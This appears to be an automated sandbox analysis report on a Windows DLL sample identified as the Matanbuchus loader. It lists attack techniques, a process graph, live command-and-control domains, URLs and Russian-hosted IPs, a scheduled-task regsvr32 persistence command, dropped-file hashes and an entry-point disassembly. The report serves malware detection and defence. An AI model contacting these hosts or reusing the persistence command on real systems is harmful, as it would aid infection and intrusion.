                Obfuscated Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging4
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Rundll32                		Cached Domain Credentials25
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526602 Sample: file.dll Startdate: 06/10/2024 Architecture: WINDOWS Score: 100 37 vilodeqa.com 2->37 39 semurox.com 2->39 47 Multi AV Scanner detection for domain / URL 2->47 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 5 other signatures 2->53 10 loaddll32.exe 1 2->10         started        12 regsvr32.exe 2->12         started        signatures3 process4 process5 14 rundll32.exe 12 10->14         started        19 cmd.exe 1 10->19         started        21 rundll32.exe 10->21         started        25 15 other processes 10->25 23 regsvr32.exe 12->23         started        dnsIp6 41 semurox.com 193.109.85.27, 443, 49699 M247GB Russian Federation 14->41 43 vilodeqa.com 193.109.85.31, 443, 49701, 49702 M247GB Russian Federation 14->43 35 C:\Users\user\8f08\user-PC\user-PC.ocx, PE32 14->35 dropped 45 System process connects to network (likely due to code injection or exploit) 14->45 27 rundll32.exe 19->27         started        29 WerFault.exe 22 16 21->29         started        file7 signatures8 process9 process10 31 MpCmdRun.exe 27->31         started        process11 33 conhost.exe 31->33         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.dll17%VirustotalBrowse
                file.dll11%ReversingLabs

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\8f08\user-PC\user-PC.ocx11%ReversingLabs
                C:\Users\user\8f08\user-PC\user-PC.ocx17%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                semurox.com3%VirustotalBrowse
                vilodeqa.com3%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://semurox.com/account.aspx8%VirustotalBrowse
                https://vilodeqa.com/detalis.aspx0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                semurox.com
                		193.109.85.27
                		truetrueunknown
                vilodeqa.com
                		193.109.85.31
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://vilodeqa.com/detalis.aspxtrueunknown
                https://semurox.com/account.aspxtrueunknown
                http://vilodeqa.com/blueoceansite/templates/docs/index.phptrue
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  193.109.85.27
                  		semurox.comRussian Federation
                  		9009M247GBtrue
                  193.109.85.31
                  		vilodeqa.comRussian Federation
                  		9009M247GBtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1526602
                  Start date and time:2024-10-06 13:24:09 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 7s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:40
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.dll
                  Detection:MAL
                  Classification:mal100.troj.evad.winDLL@44/7@3/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .dll
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.182.143.212
                  • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  13:25:15Task SchedulerRun new task: {9728E56C-DF24-4F92-ACB5-E96DE04CE0D6} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.109.85.27file.dllGet hashmaliciousMatanbuchusBrowse
                    193.109.85.31file.dllGet hashmaliciousMatanbuchusBrowse
                    • vilodeqa.com/blueoceansite/templates/docs/index.php

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    vilodeqa.comfile.dllGet hashmaliciousMatanbuchusBrowse
                    • 193.109.85.31
                    semurox.comfile.dllGet hashmaliciousMatanbuchusBrowse
                    • 193.109.85.27

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    M247GBBooking_0106.exeGet hashmaliciousAgentTeslaBrowse
                    • 172.86.66.70
                    DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                    • 185.236.203.101
                    81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                    • 82.102.27.163
                    file.dllGet hashmaliciousMatanbuchusBrowse
                    • 193.109.85.31
                    bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                    • 91.202.233.141
                    Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                    • 185.236.203.101
                    http://toomdexter.kindofx.com/c/2734/14-13347393/2/Get hashmaliciousUnknownBrowse
                    • 5.183.103.118
                    8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                    • 89.238.176.21
                    nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                    • 91.202.233.158
                    M247GBBooking_0106.exeGet hashmaliciousAgentTeslaBrowse
                    • 172.86.66.70
                    DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                    • 185.236.203.101
                    81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                    • 82.102.27.163
                    file.dllGet hashmaliciousMatanbuchusBrowse
                    • 193.109.85.31
                    bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                    • 91.202.233.141
                    Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                    • 185.236.203.101
                    http://toomdexter.kindofx.com/c/2734/14-13347393/2/Get hashmaliciousUnknownBrowse
                    • 5.183.103.118
                    8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                    • 89.238.176.21
                    nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                    • 91.202.233.158

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    37f463bf4616ecd445d4a1937da06e19zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    buildz.exeGet hashmaliciousBabuk, DjvuBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    InstallSetup.exeGet hashmaliciousStealcBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    file.dllGet hashmaliciousMatanbuchusBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    rpedido-00035.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    w2TxCv1zA8.msiGet hashmaliciousUnknownBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                    • 193.109.85.31
                    • 193.109.85.27
                    RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                    • 193.109.85.31
                    • 193.109.85.27

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_2bd39bf03e29e03d545b368d7283e7143433c9c5_7522e4b5_15f01157-ca54-48c1-9516-a88aeaad6555\Report.wer

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):0.837321042228325
                    Encrypted:false
                    SSDEEP:192:/Li9OoZg70BU/wjeTDFzuiFKZ24IO8dci:Di0egIBU/wje9zuiFKY4IO8dci
                    MD5:EF2D69A19F64ACF00C09089ADD08746F
                    SHA1:5C868137B432F04EB47E1D944B0B73A79D9ACFFA
                    SHA-256:0BCAFA298A109A28CE5FDB09D987A748C852B9BD3F716B0EB0140A891F6BFDDB
                    SHA-512:9B29D851FE6F9C08980F8BBE30D4B3C470A4036A564C2738233FDD96CE2FDDBA8BCD41762B863408EC120811A5E23CD12022BC61FFEAADE801CCBFE593982EBD
                    Malicious:false
                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.6.8.7.5.1.3.1.7.9.6.0.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.6.8.7.5.1.3.6.9.5.2.3.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.f.0.1.1.5.7.-.c.a.5.4.-.4.8.c.1.-.9.5.1.6.-.a.8.8.a.e.a.a.d.6.5.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.8.4.6.b.f.8.-.3.f.a.3.-.4.c.f.2.-.b.4.f.9.-.f.d.1.1.f.a.4.4.5.c.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.4.-.0.0.0.1.-.0.0.1.4.-.e.a.5.1.-.a.7.6.8.e.2.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4710.tmp.dmp

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 14 streams, Sun Oct 6 11:25:13 2024, 0x1205a4 type
                    Category:dropped
                    Size (bytes):48078
                    Entropy (8bit):2.045211512137186
                    Encrypted:false
                    SSDEEP:192:NbKUnav2BFLhO5H4xKfxpRpeLJDIs8w8UfKRfXbEnX/naqLZpGadMok:4UaQ+5HjfStxl8ak/bEnX/xLZ3Tk
                    MD5:68E9A17B3BBAA943AFC2A28135B4AFE8
                    SHA1:12DE1F132F540A85AF932C2CA0B479CF81D595C4
                    SHA-256:A5DA2AEC9EB67271B687585962E897452B8AEFAB9DE85AC420C0E62DCC116A59
                    SHA-512:07C06D35FA2F205ACC17319674423827B8D2C32765A28961C85F868A138D84DB1E9D7B63BB54FF451C299CB7473EB62EFECBDE2223F4C2B2BCD1A2D36484BA68
                    Malicious:false
                    Preview:MDMP..a..... ........s.g........................\...............Z'..........T.......8...........T...........H...........................................................................................................eJ......|.......GenuineIntel............T............s.g.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER481A.tmp.WERInternalMetadata.xml

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8296
                    Entropy (8bit):3.6953405940761423
                    Encrypted:false
                    SSDEEP:192:R6l7wVeJXG6I9b6YZD86d6gmfT64sxprs89b0UsfPcm:R6lXJ26I9b6YN86YgmfT64sl0Hfh
                    MD5:37321F0F67FB1D10DDC4594E6B47E3B0
                    SHA1:BD961B81344DB5334BA3B6F8D80E4A38FB89BDE9
                    SHA-256:3241F6231F417AE9BB2E1205E7C1881734E315714448CD5C295D751B2F2B6ADE
                    SHA-512:D5B226961738CE38C735087915352545A9669A985DD48F45AD9873E1320CDD9E4D2B4F6542AE7C4103B701356E6FD79E50ADFD9D79056E5FA39095F0A225C5E4
                    Malicious:false
                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.8.<./.P.i.

                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER483B.tmp.xml

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4666
                    Entropy (8bit):4.481166977274837
                    Encrypted:false
                    SSDEEP:48:cvIwWl8zs9Jg77aI96tWpW8VYeYm8M4JCdPi6FW6Fq+q8/qVbYGScSBd:uIjfXI7Yc7VeJhtTbYJ3Bd
                    MD5:F9590248AD71546D298CA35A0B46104D
                    SHA1:D6BAA294881C0547DC7ED7800B553F861EA757B2
                    SHA-256:36BC8A88B1E97ADC11FD870B1A24629BBEE3B7234089A4285E41369B6EA271DB
                    SHA-512:4C7B575E19BD0DE4900CDE3506F937ADEFE4F5081F5A90FD73A4CD017EAA93D6683384C818F03D2562620137FD5B9D706DE45DB3DD9AEDE8D2F3B154FC3FDAB8
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="531507" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                    C:\Users\user\8f08\user-PC\user-PC.ocx

                    Download File
                    Process:C:\Windows\SysWOW64\rundll32.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):552960
                    Entropy (8bit):6.6679792207122475
                    Encrypted:false
                    SSDEEP:12288:4fj+pMe5+RbbQo2I+PSkAuv6XL+61Oo6:4fO+RbbAI+PpI3l6
                    MD5:0FCF31B2D27079BABD1FA08FF5E302AE
                    SHA1:F896D351D98B7605280B3E5EB923254B73B0C6AD
                    SHA-256:673A791FE9D1BE41E6EF53B640F22B6BE06263CF4176874223178E24090B76E7
                    SHA-512:4E030E5D204D89A3031BB1001CA8D62CAC00524A520C4923D4EB9B2AF386083C73A8C2E0B5E3C9DCBEE58A71915DFC42F0113B6EE769CF813BBB32F51A961CE6
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\user-PC\user-PC.ocx, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: C:\Users\user\8f08\user-PC\user-PC.ocx, Author: unknown
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 11%
                    • Antivirus: Virustotal, Detection: 17%, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y}Bx..Bx..Bx...../Hx...../.x...../Vx..D../\x..D../Rx..D../Vx...../Ix..Bx...x..(../@x..(../Cx..(../Cx..RichBx..........................PE..L....j.g.........."!...&.Z...|H.....K........p................................O...........@.........................P...X.......x............................pN.$...................................@...@............p...............................text...?X.......Z.................. ..`.rdata...q...p...r...^..............@..@.data....wF.........................@....reloc..$....pN.....................@..B........................................................................................................................................................................................................................................................................................................................................

                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                    Download File
                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:modified
                    Size (bytes):2464
                    Entropy (8bit):3.2458909179191435
                    Encrypted:false
                    SSDEEP:24:QOaqdmuF3rzS+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxD:FaqdF7zS+AAHdKoqKFxcxkFZM
                    MD5:73F6B17B473F3D6917A559B9567498FB
                    SHA1:E117DE4CFD98729309E720A64BB4955FA88618B5
                    SHA-256:DD4790010F8CFE66AF7382D2AEFD2FE1F9CFA1AF2BA2E50C50D999D0ED2DA3E0
                    SHA-512:1D05F9993ABDA40542C0AA8261D501BAD8521279BB11B84478AA53053F931C0EF9A57BA834E4BA4E465AF5628B2329A358D49B8F974E6D631C9C267883B6B6E0
                    Malicious:false
                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 0.6. .. 2.0.2.4. .0.9.:.1.4.:.2.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                    C:\Windows\appcompat\Programs\Amcache.hve

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:MS Windows registry file, NT/2000 or above
                    Category:dropped
                    Size (bytes):1835008
                    Entropy (8bit):4.41745688266016
                    Encrypted:false
                    SSDEEP:6144:1cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNo5+:Si58oSWIZBk2MM6AFBWo
                    MD5:2AA3EEF420477EA0218E29D2160DB89D
                    SHA1:E4B13FD71766860E4BACCAA6D8CCB22CE9BB349A
                    SHA-256:1F9E96BD1761B2DA3B4A209C0E9F574FB2025D88B1F273988235A38141586A76
                    SHA-512:384FC2E99167A7FAFAA8D26724AA94B3B3E5D8E8CC5F005E64A15F24DB5A448AA0DAC76137B43707A1153EF14EACBB699955C478A25CD6CFEB7051BA5154AE13
                    Malicious:false
                    Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.C.i..................................................................................................................................................................................................................................................................................................................................................]........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.6679792207122475
                    TrID:
                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                    • Generic Win/DOS Executable (2004/3) 0.20%
                    • DOS Executable Generic (2002/1) 0.20%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.dll
                    File size:552'960 bytes
                    MD5:0fcf31b2d27079babd1fa08ff5e302ae
                    SHA1:f896d351d98b7605280b3e5eb923254b73b0c6ad
                    SHA256:673a791fe9d1be41e6ef53b640f22b6be06263cf4176874223178e24090b76e7
                    SHA512:4e030e5d204d89a3031bb1001ca8d62cac00524a520c4923d4eb9b2af386083c73a8c2e0b5e3c9dcbee58a71915dfc42f0113b6ee769cf813bbb32f51a961ce6
                    SSDEEP:12288:4fj+pMe5+RbbQo2I+PSkAuv6XL+61Oo6:4fO+RbbAI+PpI3l6
                    TLSH:C9C45BBBF601E950D0B785787700DAD994DC32309786988BFAC17FAA39A06E2C575F07
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y}Bx..Bx..Bx...../Hx...../.x...../Vx..D../\x..D../Rx..D../Vx...../Ix..Bx...x..(../@x..(../Cx..(../Cx..RichBx.................

                    File Icon

                    Icon Hash:7ae282899bbab082

                    Static PE Info

                    General

                    Entrypoint:0x1005a64b
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x10000000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                    DLL Characteristics:DYNAMIC_BASE
                    Time Stamp:0x67026A9B [Sun Oct 6 10:46:51 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:f754dc7e6c7c8cd0fb5b94cb7304da2e

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    cmp dword ptr [ebp+0Ch], 01h
                    jne 00007F227CCD70F7h
                    call 00007F227CCD74A1h
                    push dword ptr [ebp+10h]
                    push dword ptr [ebp+0Ch]
                    push dword ptr [ebp+08h]
                    call 00007F227CCD6FA3h
                    add esp, 0Ch
                    pop ebp
                    retn 000Ch
                    push ebp
                    mov ebp, esp
                    and dword ptr [104E5DECh], 00000000h
                    sub esp, 24h
                    or dword ptr [1007F330h], 01h
                    push 0000000Ah
                    call dword ptr [10067120h]
                    test eax, eax
                    je 00007F227CCD72A2h
                    and dword ptr [ebp-10h], 00000000h
                    xor eax, eax
                    push ebx
                    push esi
                    push edi
                    xor ecx, ecx
                    lea edi, dword ptr [ebp-24h]
                    push ebx
                    cpuid
                    mov esi, ebx
                    pop ebx
                    nop
                    mov dword ptr [edi], eax
                    mov dword ptr [edi+04h], esi
                    mov dword ptr [edi+08h], ecx
                    xor ecx, ecx
                    mov dword ptr [edi+0Ch], edx
                    mov eax, dword ptr [ebp-24h]
                    mov edi, dword ptr [ebp-20h]
                    mov dword ptr [ebp-0Ch], eax
                    xor edi, 756E6547h
                    mov eax, dword ptr [ebp-18h]
                    xor eax, 49656E69h
                    mov dword ptr [ebp-04h], eax
                    mov eax, dword ptr [ebp-1Ch]
                    xor eax, 6C65746Eh
                    mov dword ptr [ebp-08h], eax
                    xor eax, eax
                    inc eax
                    push ebx
                    cpuid
                    mov esi, ebx
                    pop ebx
                    nop
                    lea ebx, dword ptr [ebp-24h]
                    mov dword ptr [ebx], eax
                    mov eax, dword ptr [ebp-04h]
                    or eax, dword ptr [ebp-08h]
                    or eax, edi
                    mov dword ptr [ebx+04h], esi
                    mov dword ptr [ebx+08h], ecx
                    mov dword ptr [ebx+0Ch], edx
                    jne 00007F227CCD7135h
                    mov eax, dword ptr [ebp-24h]
                    and eax, 0FFF3FF0h
                    cmp eax, 000106C0h
                    je 00007F227CCD7115h
                    cmp eax, 00020660h
                    je 00007F227CCD710Eh
                    cmp eax, 00000070h

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x7d4500x158.rdata
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7d5a80x78.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e70000x9124.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x6c6000x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6c5400x40.rdata
